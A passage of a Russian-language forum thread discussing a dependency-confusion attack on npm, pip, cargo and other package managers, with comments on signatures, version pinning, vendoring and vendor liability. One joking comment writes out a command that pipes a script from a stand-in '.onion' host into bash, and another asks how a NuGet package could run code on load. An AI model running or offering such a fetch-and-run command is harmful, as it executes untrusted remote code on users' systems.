Ответить | Правка | Наверх | Cообщить модератору
Родитель: #70

120. Сообщение от Аноним (120), 10-Фев-21, 17:17	+1 +/–
Похоже, что пакетный ад Javascript дал о себе знать.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #135

121. Сообщение от Аноним (120), 10-Фев-21, 17:24	–2 +/–
Вообще-то когда скачивается пакет, должна подпись проверяться.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #129, #136

122. Сообщение от mumu (ok), 10-Фев-21, 17:24	+/–
Зачем тестировать? Просто пользуйтесь! Пользуйтесь все! Пока гром не грянет, мужик не перекрестится.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #130, #138

123. Сообщение от Аноним (123), 10-Фев-21, 17:49	+2 +/–
Всего 130 тысяч долларов, за такую черную ды ру, вас на..
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #150

124. Сообщение от пох. (?), 10-Фев-21, 17:50	+1 +/–
> зы: какова ответственность редхата за появление в его репозитории дырявого или протрояненого > самим автором программы пакета? ну раздавал же редхат непонятно кем и как модифицированный (и, что характерно - подписанный) ceph - и ничего, никто не пострадал. Причем, кажется, так и не выяснилось, что это было и что случилось у тех кто успел савтоапгрейдиться. Ну да, редхат врал что я не я, корова не моя, и вообще это другой, неправильный редхат сделал. А разбор инцидента, по-моему, так и зажал.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #89

125. Сообщение от пох. (?), 10-Фев-21, 17:51	+/–
> запускайте npm/pip/gems install на машинах разработчиков без изоляции а иначе нихрена не работает и не собирается. И что вот делааааать будииим?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #61 Ответы: #154

126. Сообщение от пох. (?), 10-Фев-21, 17:53	–1 +/–
> Тем проще ее заметить. И как, заметили? Пока чуваки не пришли с мешком для денег?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #98 Ответы: #145

127. Сообщение от пох. (?), 10-Фев-21, 17:56	–1 +/–
Миллиарды зависимостей зависимостей от зависимостей - как раз успешно уже сделали. Нам не надо чтоб на хруст чего-то работающее написали (вдруг они его и не пересоберут уже никогда?!) - нам как раз надо чтоб _переписывали_. А что троянцев там еще ни разу не находили - так тысячегласс же ж.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #117

128. Сообщение от Аноним (-), 10-Фев-21, 17:56	+1 +/–
Это unsafe и не позволяет делать запланированное устаревание
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41

129. Сообщение от пох. (?), 10-Фев-21, 17:57	+2 +/–
дык, норм у него была подпись - в точности того чувака, который его честно создал. Только не тот и не там, где предполагалось манки-кодером.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #121

130. Сообщение от пох. (?), 10-Фев-21, 17:58	–1 +/–
Ну ты же понимаешь, что необходимость поддерживать функции оригинала (скачав его отдельно в обход автоматики) только немного усложнит троянский код? И тест прекрасно пройден.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #122

131. Сообщение от Аноним (131), 10-Фев-21, 18:15	–3 +/–
Вот зачем девопсы нужны.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #137

132. Сообщение от JL2001 (ok), 10-Фев-21, 18:15	+/–
> сертифицированные операционные системы, поставить на которые обновлённый пакет - значит > лишиться сертификации. покажите мне сертефицированную ОСь, где сертефицированные обновления безопасности появляются быстрее, чем эксплойты у скрипткидисов
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #106

133. Сообщение от JL2001 (ok), 10-Фев-21, 18:24	+/–
> Редхат как раз и есть внутренние штатные репо самого дистра RHE Линукс. > Репы RHEL как раз внутренние репо самого RHEL. > А вот бездумное добавление в yum-dnf.conf реп третьих сторон даст уязвимость как > в новости. И некоторые и так тоже делают... Всякие там PPA > репо и прочие с хабров и т.п. "авторитетных" площадок. > Шапкины репы - внутренние для Шапки. Тут-то очень всё норм. я купил суппорт редхата, подключил их репы, автор оченьНужнойПрограммы обсфурцировал трояна в обновлении (крызыс, все выживают, как могут), оно попало в редхатовские репы, я обновился, меня хакнули какую ответственность несёт редхат?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #115 Ответы: #152

134. Сообщение от cheater (?), 10-Фев-21, 18:25	+1 +/–
> Мне интереснее, а можно ли при сборке приложения с помощью cargo использовать > только то, что идет с дистрибутивом, вообще, не залезая в интернет > (например, если это запрещено или даже, если нет интернета)? Вопрос не очень понятен (99.999... процентов пакетов в расте имеют внешние зависимости от других пакетов, эти зависимости же надо откуда-то брать), но возможно вам нужно одно из следующего: (1) команда "cargo vendor" (только с версии 1.37) выкачивает рекурсивно все зависимости пакета и включает их в пакет, что делает его пригодным для распространения оффлайн (2) можно поднять локальное зеркало crates.io, уже сказали, или скомандовать cargo брать конкретные отдельные зависимости не из инета а из локальной директории (3) можно запускать cargo с ключом --offline, запретив ему лезть в сеть (4) cargo всегда только один раз выкачивает и собирает зависимости, далее инет ему не нужен пока не произведён бамп версии где-нибудь в дереве зависимостей.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41 Ответы: #146

135. Сообщение от JL2001 (ok), 10-Фев-21, 18:28	+/–
> Похоже, что пакетный ад Javascript дал о себе знать. так и тут кровавая рука жаваскрипта?!!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #120 Ответы: #143

136. Сообщение от JL2001 (ok), 10-Фев-21, 18:30	+/–
> Вообще-то когда скачивается пакет, должна подпись проверяться. так она и проверилась, и верная но репозиторий другой и автор пакета другой я не знаю какие пакетные менеджеры умеют пинить подписи авторов пакетов
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #121 Ответы: #167

137. Сообщение от Аноним (61), 10-Фев-21, 18:44	–1 +/–
Девпсы бесполезные существа.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #131 Ответы: #188

138. Сообщение от Леголас (ok), 10-Фев-21, 18:50	+/–
Вы про Герасима?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #122

139. Сообщение от Аноним (139), 10-Фев-21, 19:01	+/–
Поддерживаю. Собственно поэтому приходится у себя в гит репозитории хранить все эти миллиарды пакетов. Неудобно, да. Но куда деваться?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #45

140. Сообщение от Аноним (140), 10-Фев-21, 19:07	+/–
Девляпсы опять налетели на проблемы говнорепозитариев... Удивительно, правда?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #141

141. Сообщение от Аноним (145), 10-Фев-21, 19:27	+1 +/–
Смузи разработчики не умеют разрабатывать.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #140

142. Сообщение от Аноним (61), 10-Фев-21, 19:27	+/–
Поднялась шумиха, и твой пакетик на проде клиента дальше летит с вирусами.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #107

143. Сообщение от Аноним (145), 10-Фев-21, 19:28	+4 +/–
Не так страшен жараскрипт как те кто на нем пишут.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #135 Ответы: #155

144. Сообщение от Аноним (145), 10-Фев-21, 19:29	+/–
Местные комментаторы уже давно знают что даже в надежном источнике с проверенной подписью есть сишная дырень.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #105 Ответы: #161

145. Сообщение от Аноним (145), 10-Фев-21, 19:30	+1 +/–
Заманивать хакера на живца/деньги/печеньки.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #126

146. Сообщение от Аноним (5), 10-Фев-21, 19:53	–1 +/–
Даже если сделать "cargo vendor", то изначально все равно крейты попадут в локальное хранилище (подкаталог проекта) из ненадежного сайта crates.io, т.е. такие крейты не будут вызывать доверия. Я же предпочел бы, чтобы крейты брались из дистрибутива линукса. Точнее, мне самому это не так важно, а важно то, что такое требование могут выставить потенциальные заказчики - к гадалке не ходи!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #134

147. Сообщение от topin89 (ok), 10-Фев-21, 20:08	+5 +/–
Озвучу для тех, кому лень переходить: Нет, в карго такой уязвимости нет. Но это вышло случайно, о такой атаке никто не думал заранее.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #65 Ответы: #202

148. Сообщение от Сишные дырени (?), 10-Фев-21, 20:09	+1 +/–
Сильвупле
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #33

149. Сообщение от Аноним (149), 10-Фев-21, 20:29	+1 +/–
Да, уважающие себя дистрибутивы, вроде Дебиана и Федоры так и делают, поэтому в них и полно всяких devel-пакетов с крейтами Rust и модулями Go Вот так, например, в дебиане выглядит утилита на расте, исходники которой одновременно идут в пакет-крейт https://packages.debian.org/source/buster/rust-exa
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41

150. Сообщение от пох. (?), 10-Фев-21, 20:34	–1 +/–
Чуваки просили передать, что мешок, в котором они уволокли дань, ничуть от этого не испортился, и они планируют зайти с ним через недельку, как только закончат подсчитывать предыдущую добычу.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #123

151. Сообщение от Атон (?), 10-Фев-21, 21:12	+/–
*банк
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43 Ответы: #162

152. Сообщение от Аноним (152), 10-Фев-21, 22:25	+2 +/–
В теории ментейнер пакетов это не просто человек-компилятор, а ещё и в код смотрит и правит перед компиляцией если нужно. Хотя я почти уверен, что у красной шляпы соглашение написано не хуже чем у MS.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #133 Ответы: #163

153. Сообщение от InuYasha (??), 10-Фев-21, 22:27	+6 +/–
Вообще от зависимостей надо лечиться, а то в диспансер на учёт поставят :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

154. Сообщение от Аноним (152), 10-Фев-21, 22:28	+2 +/–
Микросервис в вебассемблю в контейнер в виртуальную машину в облаке.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #125 Ответы: #201

155. Сообщение от InuYasha (??), 10-Фев-21, 22:29	+1 +/–
как то, что на нём пишут )
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #143

156. Сообщение от Аноним (156), 10-Фев-21, 23:38	+1 +/–
а там написано, но это ж читать букавки надо, чему многи не обучены )))
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

157. Сообщение от italliano monkey (?), 11-Фев-21, 00:03	+1 +/–
или просто Java-программист
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #102

158. Сообщение от srgazh (ok), 11-Фев-21, 00:13	–1 +/–
75% от всех зафиксированных запусков кода были связаны с загрузкой NPM- Вот это ДЫРА. Как бороться с этим node и тп...
Ответить | Правка | Наверх | Cообщить модератору

159. Сообщение от Ilya Indigo (ok), 11-Фев-21, 01:01	+1 +/–
Молодец человек! Увидел возможность, реализовал и очень не плохо на ней заработал!
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #176

160. Сообщение от Аноним (160), 11-Фев-21, 02:10	+1 +/–
Внешние автоматически выкачиваемые зависимости — это всегда риск. А вдруг завтра lodash зальют с бекдором?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #164

161. Сообщение от JL2001 (ok), 11-Фев-21, 02:12	+/–
> Местные комментаторы уже давно знают что даже в надежном источнике с проверенной > подписью есть сишная дырень. плюсую, бро!!!111
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #144

162. Сообщение от JL2001 (ok), 11-Фев-21, 02:17	+/–
> *банк огласите название, плз банк резервного фонда сша имени масонов? их СБ памятник в платине поставить надо, если они акцептуют зависимости не по типу некст-некст-некст-инстал
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #151 Ответы: #174

163. Сообщение от JL2001 (ok), 11-Фев-21, 02:20	+/–
> В теории ментейнер пакетов это не просто человек-компилятор, а ещё и в > код смотрит и правит перед компиляцией если нужно. Хотя я почти > уверен, что у красной шляпы соглашение написано не хуже чем у > MS. это то понятненько, что смотрит (в теории) но вот сейчас у меня вопрос - какая ответственность прописана у редхата/оракла/итд если их мантейнер не смог рассмотреть если пришедший пакет повлёк денежный, репутационный, моральный ущерб
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #152 Ответы: #178

164. Сообщение от JL2001 (ok), 11-Фев-21, 02:24	+/–
> Внешние автоматически выкачиваемые зависимости — это всегда риск. > А вдруг завтра lodash зальют с бекдором? а "внешнее НЕ автоматическое выкачивание зависимостей" - это как? или у вас тоже СБ круче мантейнеров редхата?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #160

165. Сообщение от deeaitch (ok), 11-Фев-21, 04:05	+/–
Вот кто бы сомневался во всех этох npn, ruby-чего-то там. Там же будет и всё остальное подобное.
Ответить | Правка | Наверх | Cообщить модератору

166. Сообщение от Аноним (167), 11-Фев-21, 05:16	+/–
Надуманная проблема для python. --extra-index-url там никто не использует, кроме Microsoft, как раз по этой причине. Плюс версии пакетов блокируются в venv при разработке, так что в CI никаких чудес не будет. Скукота.
Ответить | Правка | Наверх | Cообщить модератору

167. Сообщение от Аноним (167), 11-Фев-21, 05:19	+/–
Есть лучше вариант — пинить версии пакетов (и всех зависимостей конечно) и умеют это чуть менее чем все современные менеджеры пакетов скриптовых языков.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #136 Ответы: #179

171. Сообщение от anonymous (??), 11-Фев-21, 11:17	+1 +/–
Против выступать легко. А что в замен предложите?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #45

172. Сообщение от anonymous (??), 11-Фев-21, 11:19	+1 +/–
Во-первых в rust этой уязвимости нет. Во-вторых rust -- это про safety, а не про security.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52

173. Сообщение от .NET (?), 11-Фев-21, 14:09	+/–
А как выполнить произвольный код в NuGet-пакете после его загрузки, если ни один из его типов не используется? Статические конструкторы и module initializers (https://docs.microsoft.com/en-us/dotnet/csharp/whats-new/csh... вызываются непосредственно перед доступом к типам. Для ASP.NET есть атрибут PreApplicationStartMethodAttribute, но в .NET Core его убрали. Только внедрением низкоуровневого кода в DllMain?
Ответить | Правка | Наверх | Cообщить модератору

174. Сообщение от Атон (?), 11-Фев-21, 14:41	–1 +/–
>> *банк > огласите название, плз крупный банк.  сбер, втб, райф, другие > их СБ памятник в платине поставить надо, если они акцептуют зависимости не > по типу некст-некст-некст-инстал никто не знает как, но времени это занимает много.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #162

176. Сообщение от Аноним (176), 11-Фев-21, 15:49	+2 +/–
А мог бы стать миллионом собирая фермы на ригах
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #159

178. Сообщение от fske (?), 11-Фев-21, 18:44	+/–
>какая ответственность прописана у редхата/оракла/итд очень простая - ни одна айти контора не будет нести ответственность за твой бизнес, который может пострадать из-за использования или неиспользования их продуктов.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #163

179. Сообщение от JL2001 (ok), 11-Фев-21, 18:45	+/–
> Есть лучше вариант — пинить версии пакетов (и всех зависимостей конечно) и > умеют это чуть менее чем все современные менеджеры пакетов скриптовых языков. у меня есть проект-либа и 100500 зависящих от неё проектов я апаю версию либы и должен собрать релиз из 100500 проектов для глобального предпрод-тестирования мне пойти и в каждом из них прописать "теперь я завишу от версии либы +1" ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #167

180. Сообщение от ЧешкиЧехова (?), 11-Фев-21, 19:07	+4 +/–
ЛапкоКодеры импортируют на лету непроверенное гавно из внешних источников в прод рантайм. Так вообще можно было сразу форму отправки для загрузки произвольного крипта сделать и повесить на главную, механика даже не уровня xss. Виток "Кнута-Смузи": 1 Тяжёлые времена рождают сильных кодеров. 2 Сильные кодеры ролждают либы и фреймворки. 3 Фреймворки и либы рождают слабых кодеров. 4 Слабые кодеры рождают тяжёлые времена. Мы где то в середине 4ой стадии. А все умы идут в децентрализацию, trust computing и прочие умные модели, чтобы закрыть эпоху смузихлебов танцующих дырявую Тьюринг машину.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10 Ответы: #196, #204

181. Сообщение от еман (?), 11-Фев-21, 22:15	+/–
в Go - ещё лучше: на go get, go лезет к гуглу и спрашивает у него, можно ли скачать такой-то пакет, и качает только после утвердительного ответа. так что, если пакета нет в общественнодоступном ынтернете, нужно пользоваться специальными параметрами и специальными конфигурациями.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #94

183. Сообщение от Bob (??), 12-Фев-21, 00:09	+1 +/–
Или заводить трактор, взяв месяц больничного и месяц отпуска, оплачиваемых)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #84

184. Сообщение от Аноним (-), 12-Фев-21, 03:38	–1 +/–
Так, блин, это ж программировать надо?! А вот это вебмакаки не умеют. Ну, сколько из вас хотя-бы код Хэмминга сможет накодить? Сами? Без подсматривания к другим и чужих либ? А чтоб еще и эффективно?! p.s. это, кстати, было жестко обстебано в "масяне". Мол, вы берете флешку с википедией, валите в прошлое... у вас все знания мира! Скоро весь мир будет у ваших ног! Вы сможете невероятно продвинуть человечество в развитии тысячу лет назад, попутно озолотившись. Так, стоп? В древнем мире оказывается нет компьютеров. А как работает флеш-память вы, разумеется, не знаете. И уж тем более не сможете объяснить это другим. Поэтому ваши знания будут недоступны следующую 1000 лет, а потом они уже и не нужны как раз. А вы - лох! Который даже формулу пороха не знает! А все что лох по жизни умеет - програмить плагинчики к какой-то ненужности. Без этой ненужности лох вообще совершенно бесполезен. (краткое содержание, вольный пересказ, возможны неточности)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38

185. Сообщение от Аноним (-), 12-Фев-21, 03:39	+1 +/–
> Правильно, если у тебя в большом проекте 1 000 000 однострочников ...то ты сделал что-то ну вот вообще совсем не так...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48

186. Сообщение от Аноним (-), 12-Фев-21, 03:43	–3 +/–
> доступна только при FFI (с либами, написанными на других языках) Да у них и сам яп бесполезен без сишно-сиплюсплюсного LLVM'а. Это не мешаер растаманам быковать на си и плюсы, в таких мелочах "системные" вебмакаки не парятся :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #68

187. Сообщение от Стереопаштет (?), 12-Фев-21, 06:10	+1 +/–
Проблема не в навыках, а в том что рынку нужно быстро и дешево. За идеальных сферических коней в вакууме никто не собирается платить. И если ты предложишь бизнесу писать велосипеды с нуля или перепроверять каждую версию каждой зависимости - на тебя как минимум посмотрят как на сумасшедшего. Либо ты находишь балланс между затратами-сесурити-скоростью разработки-багами-фичами, либо идешь ночевать под мостом (зато ты гордый и правильный! Не смузихлеб и не девляпс.).
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #104

188. Сообщение от Рр (?), 12-Фев-21, 06:15	–1 +/–
Ненавижу девопсов. Меня в детстве огромный лохматый девопс покусал за ногу.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #137

189. Сообщение от Аноним (189), 12-Фев-21, 14:41	+/–
А зря.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #81

191. Сообщение от Аноним (189), 12-Фев-21, 14:43	+/–
Другим урок. Расслабляться нельзя. Всё время надо быть на чеке.
Ответить | Правка | Наверх | Cообщить модератору

194. Сообщение от Аноним (194), 13-Фев-21, 00:49	+/–
Недавно я с удивлением заметил, какому количеству полезных вещей мы обязаны растительному миру нашей планеты. IT-корпорации должны быть разрушены.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #51

195. Сообщение от Аноним (194), 13-Фев-21, 00:51	+/–
Да. В интернете может что угодно в любой момент исчезнуть навсегда, не оставив следов, и не достучишься. Страшное чувство.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #113

196. Сообщение от Aga (??), 14-Фев-21, 00:03	+/–
давайте тогда делать вебсайты без этих ваших фреймворков и MVC, будем складывать все в условный index.php, чтобы чувствовать себя сильными кодерами
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #180 Ответы: #198

197. Сообщение от Аноним (-), 14-Фев-21, 05:43	+/–
На этот случай есть безопасТное восстановление паролей через ваши безопасТные мобильники. Номера на которых сейчас не подделывает только ленивый.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #26

198. Сообщение от Аноним (-), 14-Фев-21, 08:14	+2 +/–
> давайте тогда делать вебсайты без этих ваших фреймворков и MVC, будем складывать > все в условный index.php, чтобы чувствовать себя сильными кодерами ЧСХ пока так делали - работало явно лучше. Во всяком случае, гиг RAM на рендер не жрало и не грузилось по 5 минут, даже несмотря на тормозные диалапы с GPRS и ADSL-ями.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #196 Ответы: #203

199. Сообщение от Аноним (199), 14-Фев-21, 23:56	+/–
в русте зависимости ставятся через wget https://sploit.onion/l33t.sh | bash. до менеджера пакета форк-бомба просто не дойдёт - сработает раньше. безопасность же.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

200. Сообщение от Аноним (200), 15-Фев-21, 14:14	+/–
Ваш комментарий в моей голове был озвучен голосом нежити из Варкрафта 3 ))
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

201. Сообщение от Аноним (201), 16-Фев-21, 18:46	+/–
А в яйце игла
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #154

202. Сообщение от rex (??), 18-Фев-21, 13:30	+/–
В смысле, никто не думал заранее? Я всегда считал это багом многих утилит работы с пакетами. А вот, например, в `docker pull` явно прописывается адрес регистри.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #147

203. Сообщение от rico (ok), 18-Фев-21, 18:52	+/–
Принцип модульности Орлова: если из распечатки одного модуля программы можно свить веревку, на которой можно повесить программиста, его написавшего, то все это следует сделать.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #198

204. Сообщение от RedEyedMan (ok), 26-Фев-21, 14:09	+/–
Вполне нормальное явление. Иначе зачем все эти либы и фреймворки, сильные обойдутся и без них. А я слабый, пользуюсь либами и фреймворками.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #180

205. Сообщение от Sample (??), 01-Мрт-21, 14:58	+/–
Наши деды славные  победы, вот  где  наши  деды
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #102

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема